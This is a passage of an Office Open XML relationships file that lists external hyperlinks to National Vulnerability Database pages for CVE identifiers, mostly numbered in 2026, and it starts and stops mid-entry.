Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77648" TargetMode="External" Id="rId5936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84225" TargetMode="External" Id="rId5937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0292" TargetMode="External" Id="rId5938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15310" TargetMode="External" Id="rId5939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21109" TargetMode="External" Id="rId5940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-23922" TargetMode="External" Id="rId5941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64655" TargetMode="External" Id="rId5942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67350" TargetMode="External" Id="rId5943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71326" TargetMode="External" Id="rId5944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72924" TargetMode="External" Id="rId5945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73427" TargetMode="External" Id="rId5946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81638" TargetMode="External" Id="rId5947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82865" TargetMode="External" Id="rId5948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85458" TargetMode="External" Id="rId5949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85513" TargetMode="External" Id="rId5950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86163" TargetMode="External" Id="rId5951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86164" TargetMode="External" Id="rId5952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86170" TargetMode="External" Id="rId5953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86171" TargetMode="External" Id="rId5954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86172" TargetMode="External" Id="rId5955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86182" TargetMode="External" Id="rId5956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86212" TargetMode="External" Id="rId5957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86215" TargetMode="External" Id="rId5958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86216" TargetMode="External" Id="rId5959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86228" TargetMode="External" Id="rId5960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86232" TargetMode="External" Id="rId5961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86233" TargetMode="External" Id="rId5962" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86234" TargetMode="External" Id="rId5963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86235" TargetMode="External" Id="rId5964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86236" TargetMode="External" Id="rId5965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86238" TargetMode="External" Id="rId5966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86241" TargetMode="External" Id="rId5967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86244" TargetMode="External" Id="rId5968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86245" TargetMode="External" Id="rId5969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86264" TargetMode="External" Id="rId5970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86265" TargetMode="External" Id="rId5971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86267" TargetMode="External" Id="rId5972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86269" TargetMode="External" Id="rId5973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86270" TargetMode="External" Id="rId5974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86278" TargetMode="External" Id="rId5975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86279" TargetMode="External" Id="rId5976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86281" TargetMode="External" Id="rId5977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86285" TargetMode="External" Id="rId5978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86288" TargetMode="External" Id="rId5979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86289" TargetMode="External" Id="rId5980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86291" TargetMode="External" Id="rId5981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86294" TargetMode="External" Id="rId5982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86307" TargetMode="External" Id="rId5983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86309" TargetMode="External" Id="rId5984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86310" TargetMode="External" Id="rId5985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86512" TargetMode="External" Id="rId5986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86514" TargetMode="External" Id="rId5987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86515" TargetMode="External" Id="rId5988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86517" TargetMode="External" Id="rId5989" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86518" TargetMode="External" Id="rId5990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86668" TargetMode="External" Id="rId5991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86674" TargetMode="External" Id="rId5992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86675" TargetMode="External" Id="rId5993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86744" TargetMode="External" Id="rId5994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87923" TargetMode="External" Id="rId5995" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87926" TargetMode="External" Id="rId5996" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71402" TargetMode="External" Id="rId5997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16003" TargetMode="External" Id="rId5998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48791" TargetMode="External" Id="rId5999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52791" TargetMode="External" Id="rId6000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53759" TargetMode="External" Id="rId6001" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67442" TargetMode="External" Id="rId6002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72729" TargetMode="External" Id="rId6003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79783" TargetMode="External" Id="rId6004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85406" TargetMode="External" Id="rId6005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85643" TargetMode="External" Id="rId6006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86150" TargetMode="External" Id="rId6007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86181" TargetMode="External" Id="rId6008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86226" TargetMode="External" Id="rId6009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86240" TargetMode="External" Id="rId6010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86271" TargetMode="External" Id="rId6011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86301" TargetMode="External" Id="rId6012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86424" TargetMode="External" Id="rId6013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86644" TargetMode="External" Id="rId6014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86667" TargetMode="External" Id="rId6015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11735" TargetMode="External" Id="rId6016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11736" TargetMode="External" Id="rId6017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82312" TargetMode="External" Id="rId6018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9215" TargetMode="External" Id="rId6019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86227" TargetMode="External" Id="rId6020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9216" TargetMode="External" Id="rId6021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0291" TargetMode="External" Id="rId6022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0302" TargetMode="External" Id="rId6023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0308" TargetMode="External" Id="rId6024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11733" TargetMode="External" Id="rId6025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11734" TargetMode="External" Id="rId6026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86422" TargetMode="External" Id="rId6027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88790" TargetMode="External" Id="rId6028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0289" TargetMode="External" Id="rId6029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0290" TargetMode="External" Id="rId6030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-47996" TargetMode="External" Id="rId6031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-26962" TargetMode="External" Id="rId6032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-35497" TargetMode="External" Id="rId6033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-50998" TargetMode="External" Id="rId6034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-50999" TargetMode="External" Id="rId6035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-51000" TargetMode="External" Id="rId6036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54354" TargetMode="External" Id="rId6037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-7049" TargetMode="External" Id="rId6038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-57231" TargetMode="External" Id="rId6039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24442" TargetMode="External" Id="rId6040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26350" TargetMode="External" Id="rId6041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28523" TargetMode="External" Id="rId6042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34412" TargetMode="External" Id="rId6043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-36392" TargetMode="External" Id="rId6044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38626" TargetMode="External" Id="rId6045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38998" TargetMode="External" Id="rId6046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43635" TargetMode="External" Id="rId6047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43645" TargetMode="External" Id="rId6048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45219" TargetMode="External" Id="rId6049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45220" TargetMode="External" Id="rId6050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4765" TargetMode="External" Id="rId6051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49153" TargetMode="External" Id="rId6052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49154" TargetMode="External" Id="rId6053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49155" TargetMode="External" Id="rId6054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49156" TargetMode="External" Id="rId6055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49947" TargetMode="External" Id="rId6056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52307" TargetMode="External" Id="rId6057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52482" TargetMode="External" Id="rId6058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54920" TargetMode="External" Id="rId6059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55891" TargetMode="External" Id="rId6060" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56125" TargetMode="External" Id="rId6061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57844" TargetMode="External" Id="rId6062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61634" TargetMode="External" Id="rId6063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68006" TargetMode="External" Id="rId6064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70613" TargetMode="External" Id="rId6065" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70614" TargetMode="External" Id="rId6066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71612" TargetMode="External" Id="rId6067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71614" TargetMode="External" Id="rId6068" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71616" TargetMode="External" Id="rId6069" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71620" TargetMode="External" Id="rId6070" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71640" TargetMode="External" Id="rId6071" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71642" TargetMode="External" Id="rId6072" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71643" TargetMode="External" Id="rId6073" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71645" TargetMode="External" Id="rId6074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71647" TargetMode="External" Id="rId6075" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71801" TargetMode="External" Id="rId6076" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71802" TargetMode="External" Id="rId6077" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71807" TargetMode="External" Id="rId6078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71809" TargetMode="External" Id="rId6079" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72885" TargetMode="External" Id="rId6080" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73392" TargetMode="External" Id="rId6081" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75167" TargetMode="External" Id="rId6082" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75171" TargetMode="External" Id="rId6083" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75308" TargetMode="External" Id="rId6084" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75429" TargetMode="External" Id="rId6085" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75439" TargetMode="External" Id="rId6086" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7809" TargetMode="External" Id="rId6087" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78849" TargetMode="External" Id="rId6088" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78971" TargetMode="External" Id="rId6089" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79379" TargetMode="External" Id="rId6090" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79387" TargetMode="External" Id="rId6091" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79389" TargetMode="External" Id="rId6092" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79573" TargetMode="External" Id="rId6093" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79577" TargetMode="External" Id="rId6094" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79590" TargetMode="External" Id="rId6095" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79591" TargetMode="External" Id="rId6096" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79592" TargetMode="External" Id="rId6097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80841" TargetMode="External" Id="rId6098" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80847" TargetMode="External" Id="rId6099" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80858" TargetMode="External" Id="rId6100" /><Relationship 